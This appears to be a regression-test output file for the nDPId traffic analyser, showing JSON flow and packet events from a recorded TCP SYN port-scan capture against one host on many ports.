+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsZEIAADgGrDCsEAAIQA2GNIzSCjDdUoMYAAAAAGACBAAqXwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsnDoAADUGdzisEAAIQA2GNIzSAcrdUoMYAAAAAGACCAAuxQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAs3AsAADkGM2esEAAIQA2GNIzSBCzdUoMYAAAAAGACCAAsYwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsqx8AACoGc1OsEAAIQA2GNIzSBqTdUoMYAAAAAGACDAAl6wAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsIRsAACkG\/lesEAAIQA2GNIzSArPdUoMYAAAAAGACCAAt3AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsTGQAACcG1Q6sEAAIQA2GNIzSFxbdUoMYAAAAAGACEAAReQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsspgAACoGa9qsEAAIQA2GNIzSI4\/dUoMYAAAAAGACDAAJAAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_packet_id":1,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060456,"pkt":"ACYLMQczACWzv5HuCABFAAAszS8AADgGQ0OsEAAIQA2GNIzTgAHdU4MZAAAAAGACBAC0igAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_packet_id":1,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060456,"pkt":"ACYLMQczACWzv5HuCABFAAAsqHEAADUGawGsEAAIQA2GNIzTAsfdU4MZAAAAAGACCAAtxQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsdBIAADgGnGCsEAAIQA2GNIzTB\/ndU4MZAAAAAGACBAAskwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsSU4AADMGzCSsEAAIQA2GNIzTBErdU4MZAAAAAGACEAAkQgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsCE4AADMGDSWsEAAIQA2GNIzTDd\/dU4MZAAAAAGACEAAarQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsJf4AACgG+nSsEAAIQA2GNIzTG3HdU4MZAAAAAGACBAAZGwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsinkAAC8GjvmsEAAIQA2GNIzTFajdU4MZAAAAAGACEAAS5AAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsvrkAADEGWLmsEAAIQA2GNIzTaXjdU4MZAAAAAGACCADHEwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsP2QAADMG1g6sEAAIQA2GNIzTBGTdU4MZAAAAAGACEAAkKAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/5IAAC0GG+CsEAAIQA2GNIzTDtjdU4MZAAAAAGACCAAhtAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAs3zQAADIGNz6sEAAIQA2GNIzTB7TdU4MZAAAAAGACDAAk2AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAs75sAADEGJ9esEAAIQA2GNIzTBCXdU4MZAAAAAGACCAAsZwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsr2oAADsGXgisEAAIQA2GNIzTAGrdU4MZAAAAAGACEAAoIgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsrmoAACcGcwisEAAIQA2GNIzTBBXdU4MZAAAAAGACEAAkdwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsTr8AACYG07OsEAAIQA2GNIzTBIvdU4MZAAAAAGACDAAoAQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs6UAAADcGKDKsEAAIQA2GNIzTCirdU4MZAAAAAGACEAAeYgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs4BwAAC0GO1asEAAIQA2GNIzTBd3dU4MZAAAAAGACCAAqrwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 